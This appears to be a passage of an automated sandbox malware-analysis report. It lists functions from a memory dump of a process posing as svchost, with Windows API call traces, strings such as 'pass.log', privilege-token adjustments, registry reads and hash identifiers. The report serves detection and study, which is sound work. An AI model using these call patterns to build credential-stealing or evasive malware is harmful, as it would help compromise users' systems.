                                                                                                                                                                                                              • API String ID: 3061335427-0
                                                                                                                                                                                                              • Opcode ID: 7a5775a5f0367fbccaaa10c4d2cd25080d58d558112390c38c1cbb3c92dad01e
                                                                                                                                                                                                              • Instruction ID: 89723e7774616d490bb81a221d68bcc37321e4a9a9d01618894da5508581b8ce
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a5775a5f0367fbccaaa10c4d2cd25080d58d558112390c38c1cbb3c92dad01e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 072160F2A017144BD730AF79EC8174BB7E4AF84225B594D3FD78AD6600D370E1558B91
                                                                                                                                                                                                              Function 02C978E0 Relevance: 8.8, APIs: 7, Instructions: 64memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02C974A0: CreateFileA.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,74DEF380,00000000,00000000,?,?,02CA4E91,?,00000000), ref: 02C974C6
                                                                                                                                                                                                                • Part of subcall function 02C974A0: GetFileSizeEx.KERNEL32(00000000,?,?,?,02CA4E91,?,00000000,?,?,00000000), ref: 02C974E4
                                                                                                                                                                                                                • Part of subcall function 02C974A0: GetProcessHeap.KERNEL32(00000008,?,?,?,02CA4E91,?,00000000,?,?,00000000), ref: 02C9750D
                                                                                                                                                                                                                • Part of subcall function 02C974A0: RtlAllocateHeap.NTDLL(00000000,?,?,02CA4E91,?,00000000,?,?,00000000), ref: 02C97514
                                                                                                                                                                                                                • Part of subcall function 02C974A0: memset.MSVCRT ref: 02C97527
                                                                                                                                                                                                                • Part of subcall function 02C974A0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C97553
                                                                                                                                                                                                                • Part of subcall function 02C974A0: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C97563
                                                                                                                                                                                                                • Part of subcall function 02C974A0: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02C97572
                                                                                                                                                                                                                • Part of subcall function 02C974A0: UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02C97585
                                                                                                                                                                                                                • Part of subcall function 02C974A0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C97594
                                                                                                                                                                                                                • Part of subcall function 02C974A0: HeapValidate.KERNEL32(00000000), ref: 02C9759B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000013,?,00000000,00000000,00000000,74DF2F00,02CA3D3F), ref: 02C9791C
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02C97923
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C97933
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,74DF2F00,02CA3D3F), ref: 02C97955
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02C97958
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C97965
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02C97968
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$File$Process$Validatememset$AllocAllocateCreateFreeLockPointerReadSizeUnlock
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4191958461-0
                                                                                                                                                                                                              • Opcode ID: d0d2e53572e6d097ed0b2a79f3d745367c2fb81c3420e87e909c64dc84248585
                                                                                                                                                                                                              • Instruction ID: 5025bb2f74bba9ffdd1a970fe184446ceedf320553e8c3270df92dcc368ab906
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0d2e53572e6d097ed0b2a79f3d745367c2fb81c3420e87e909c64dc84248585
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4711C6B1B02214AFDB20AAA59C48F5FB66CEF84B55F550214F905E7240DB70DA18C6E0
                                                                                                                                                                                                              Function 02CAB110 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C419D), ref: 02CAB137
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 02CAB175
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 02CAB1B9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FilePath$AttributesBackslashExists
                                                                                                                                                                                                              • String ID: A23C419D$pass.log
                                                                                                                                                                                                              • API String ID: 2713433229-1414824029
                                                                                                                                                                                                              • Opcode ID: e99f82676b6e0f28245a61d6fcc1ad0443d56bbeb1dff6a6fff41220e4a33b07
                                                                                                                                                                                                              • Instruction ID: c51bd066578ebd40e5e561e3ca70d3a047edf423c31649eeca6714226092b4b4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e99f82676b6e0f28245a61d6fcc1ad0443d56bbeb1dff6a6fff41220e4a33b07
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C1108749046594BCB218B28AD687EBBBE4EBD6304F144AA5DDCEC7300EB709954C7C0
                                                                                                                                                                                                              Function 02CA41E0 Relevance: 8.8, APIs: 7, Instructions: 55memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,02CB5097,00000000,75A934D0,?,?,02CB5084,00000104,?,?,?,?,00000000,00000000), ref: 02CA41FE
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,02CB5084,00000104,?,?,?,?,00000000,00000000), ref: 02CA4205
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA4215
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,75A934D0,?,?,02CB5084,00000104,?,?,?,?,00000000,00000000), ref: 02CA4229
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,02CB5084,00000104,?,?,?,?,00000000,00000000), ref: 02CA4230
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,02CB4081,?,?,02CB5084,00000104,?,?,?,?,00000000,00000000), ref: 02CA424A
                                                                                                                                                                                                              • HeapReAlloc.KERNEL32(00000000,?,?,02CB5084,00000104,?,?,?,?,00000000,00000000), ref: 02CA4251
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$Alloc$Validatememset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3638075499-0
                                                                                                                                                                                                              • Opcode ID: 7df6e596268c58510a02a360836ebfdd46d4ed887d58dd595c9030d6a1eb675a
                                                                                                                                                                                                              • Instruction ID: a71b882b5122ba9b753e4abdc15ecc439beeb658c77eb41caa9082fe6d332678
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7df6e596268c58510a02a360836ebfdd46d4ed887d58dd595c9030d6a1eb675a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8901F273B822116BD72056AAAC48F4B7A5CEFD47F6F554321FB08C7280CA61D81482F0
                                                                                                                                                                                                              Function 02CA7810 Relevance: 8.8, APIs: 7, Instructions: 50memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02CB4980: OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,76ECFFB0,?,?,?,?,?,02CA7967,00000000,?,00000000), ref: 02CB49AD
                                                                                                                                                                                                                • Part of subcall function 02CB4980: GetProcessTimes.KERNEL32(00000000,?,?,?,02CA7967,?,?,?,?,?,02CA7967,00000000,?,00000000), ref: 02CB49CA
                                                                                                                                                                                                                • Part of subcall function 02CB4980: GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,02CA7967,00000000,?,00000000), ref: 02CB49E2
                                                                                                                                                                                                                • Part of subcall function 02CB4980: CloseHandle.KERNEL32(00000000,?,?,?,?,?,02CA7967,00000000), ref: 02CB49F3
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(02CDFB80,000002F0,00000000,00000000,072018B8,02CA7AD4), ref: 02CA7828
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(02CDFB80), ref: 02CA7844
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,072018B8), ref: 02CA7869
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA786C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,072018B8), ref: 02CA7879
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA787C
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(02CDFB80), ref: 02CA7887
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HeapProcess$CriticalSection$HandleLeave$CloseEnterFreeInformationOpenTimesValidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3901171168-0
                                                                                                                                                                                                              • Opcode ID: aa8b9857f32c5fe2e2b5e95d9704878fabbce54e23beb908078735c279f0146a
                                                                                                                                                                                                              • Instruction ID: 748fdbf7e10aa1d098dc15ab03ff6103a7c251e75be8c84821499a5d6e94f329
                                                                                                                                                                                                              • Opcode Fuzzy Hash: aa8b9857f32c5fe2e2b5e95d9704878fabbce54e23beb908078735c279f0146a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B2018832E42211ABD7205F959858B5FB768FFCCBA6B554529E146E7100C7309414C7E0
                                                                                                                                                                                                              Function 02CB59D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02CB5930: GetCurrentThread.KERNEL32 ref: 02CB5940
                                                                                                                                                                                                                • Part of subcall function 02CB5930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02CA4D1B,?,?,00000000), ref: 02CB5947
                                                                                                                                                                                                                • Part of subcall function 02CB5930: GetCurrentProcess.KERNEL32(00000020,02CA4D1B,?,?,?,?,02CA4D1B,?,?,00000000), ref: 02CB5957
                                                                                                                                                                                                                • Part of subcall function 02CB5930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02CA4D1B,?,?,00000000), ref: 02CB595E
                                                                                                                                                                                                                • Part of subcall function 02CB5930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02CB5981
                                                                                                                                                                                                                • Part of subcall function 02CB5930: AdjustTokenPrivileges.KERNELBASE(02CA4D1B,00000000,00000001,00000000,00000000,00000000), ref: 02CB599B
                                                                                                                                                                                                                • Part of subcall function 02CB5930: GetLastError.KERNEL32 ref: 02CB59A5
                                                                                                                                                                                                                • Part of subcall function 02CB5930: FindCloseChangeNotification.KERNEL32(02CA4D1B), ref: 02CB59B6
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02CB59EE
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02C95DE8,?,?,02C95DE8,?,00000001), ref: 02CB5A0B
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(?,02C95DE8,00000010,00000000,00000000,00000000,00000001), ref: 02CB5A26
                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,02C95DE8,?,00000001), ref: 02CB5A37
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Security$DescriptorToken$CurrentOpenProcessThread$AdjustChangeCloseConvertErrorFindFreeInfoLastLocalLookupNamedNotificationPrivilegePrivilegesSaclStringValue
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 141549399-820036962
                                                                                                                                                                                                              • Opcode ID: 74f48ea307efb0f1aacfe4555080659f431d9091c158cbf10d9c7b5169fdbfe9
                                                                                                                                                                                                              • Instruction ID: 0de1d20336dcb6bc3487653c01f7411db83ec422905246b9f23bf06fe8d0d89f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 74f48ea307efb0f1aacfe4555080659f431d9091c158cbf10d9c7b5169fdbfe9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D014C75A41218BBDB10DBA59C84EEFBBBCEF45784F804159B905E3140D770EA05CBE0
                                                                                                                                                                                                              Function 00401420 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                              • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1545651562-3277137149
                                                                                                                                                                                                              • Opcode ID: 846a4d946463fd889953915331e6662e7c5f164914c665561fc20ec9cc3dfa3e
                                                                                                                                                                                                              • Instruction ID: 5661f09ceaf7dd6985fdec3726855c2d4268d42b19af7d6053b1c23afd98fc53
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 846a4d946463fd889953915331e6662e7c5f164914c665561fc20ec9cc3dfa3e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3001DB716003049BC714ABBAAC829D6B79DDF89745300813AEB19E32E2C635DC488BAD
                                                                                                                                                                                                              Function 02C93830 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,02C93B17), ref: 02C93864
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(00000000,5dd2bf87a,00000000,?,00000000,?), ref: 02C93885
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 02C93893
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                                                              • String ID: 5dd2bf87a$software\microsoft
                                                                                                                                                                                                              • API String ID: 3677997916-846386698
                                                                                                                                                                                                              • Opcode ID: 17273663e69d684143940073d0e7a70c5c40d4277209cd1e25da15ca8aee8366
                                                                                                                                                                                                              • Instruction ID: 452efb933f5bbb225136458b3ac46963c6616dd97e862eadfd79733a9f8b212a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 17273663e69d684143940073d0e7a70c5c40d4277209cd1e25da15ca8aee8366
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 49F03174E40308FBEF10CF94C945BEE77BCEB04745F904599E905E7280D775A6008B94
                                                                                                                                                                                                              Function 00401390 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23libraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                              • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1545651562-3277137149
                                                                                                                                                                                                              • Opcode ID: ffa31b1aa032498b302ac31cd015523b39c7887b3f6490af6b71b29526461ec5
                                                                                                                                                                                                              • Instruction ID: 972971b60caab807df67e590393efcb4d1d6a3813561f3a0b79f06a1da21d750
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ffa31b1aa032498b302ac31cd015523b39c7887b3f6490af6b71b29526461ec5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69E01AB06203049BEB10AFB1AD09A5637DC9FC47413048032BB09F21A1DA38C8248B6D
                                                                                                                                                                                                              Function 02CA4120 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23libraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 02CA412B
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,?,02CA1163,00001000,?,?), ref: 02CA413C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 02CA414C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                              • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1545651562-3277137149
                                                                                                                                                                                                              • Opcode ID: 30baed354cb88842e4267a3cc6270105f43b85debfb3daf2948db06ba7880d93
                                                                                                                                                                                                              • Instruction ID: 209e299a018b1d126bcbd6a58bc36c69221e16905cad47613e3e60fa609e2dc8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 30baed354cb88842e4267a3cc6270105f43b85debfb3daf2948db06ba7880d93
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FEE01A30FC23015BF7149F71AC09F2637ADBA957883408E36A616D9100DBB08620C661
                                                                                                                                                                                                              Function 02CA43D0 Relevance: 7.6, APIs: 5, Instructions: 111COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CA43D9
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02CA440C
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02CA4438
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02CA445F
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 02CA44DD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2886163261-0
                                                                                                                                                                                                              • Opcode ID: fbd1472412db33d18dfe8af802a5228c7f93412a5be97fe22acf2b6d9f082b3b
                                                                                                                                                                                                              • Instruction ID: 5996c5680165bf024147802b21a7d29fe27e4d97a2ff724b9389bbf1e4469e00
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fbd1472412db33d18dfe8af802a5228c7f93412a5be97fe22acf2b6d9f082b3b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83413E71D01219EFDB14CFA8C894AAEBBF5FF48304F14856AE815E7240E7B49A40CF90
                                                                                                                                                                                                              Function 02CAAAA0 Relevance: 7.6, APIs: 6, Instructions: 106memorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CAAACC
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CAAAF1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000012,?,?,?,?,?,02CA1A39), ref: 02CAAB71
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,02CA1A39), ref: 02CAAB78
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CAAB88
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,00000000,00000001,?,?,?,?,?,02CA1A39), ref: 02CAAB9D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heapstrstr$AllocProcesslstrcpynmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2033102291-0
                                                                                                                                                                                                              • Opcode ID: 43b8412e0215d2402d800698bff49c15c3091ef985aaf727bda61161dfb57b33
                                                                                                                                                                                                              • Instruction ID: 59c0312967d54f2fa107574a192daa03d07e0cd3d0b9c80bd2c54baa33782e96
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 43b8412e0215d2402d800698bff49c15c3091ef985aaf727bda61161dfb57b33
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33313B7290221B5BD7324E28ECA4BBA7BBB9FC129CF184625EC49C7241D732DA05C6D0
                                                                                                                                                                                                              Function 02CA42A0 Relevance: 7.6, APIs: 5, Instructions: 105COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CA42A9
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02CB5460,?,0000001C), ref: 02CA42DC
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02CB5460,?,0000001C), ref: 02CA4308
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02CB5460,?,0000001C), ref: 02CA432F
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 02CA43AD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2886163261-0
                                                                                                                                                                                                              • Opcode ID: 104dc6f997a464f0459b5f59a1954433319605f25b54a5d5032cbbc5235bfb53
                                                                                                                                                                                                              • Instruction ID: 4c1a58cccb53d010d431228057d7f4eae1702e628890b9867615e533478d2b95
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 104dc6f997a464f0459b5f59a1954433319605f25b54a5d5032cbbc5235bfb53
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A411B70D41219EFDB24DFA8D894AEEBBF5EF48704F50892AE409E7200D7B49A408F91
                                                                                                                                                                                                              Function 02C913B0 Relevance: 7.6, APIs: 5, Instructions: 94COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02C913DE
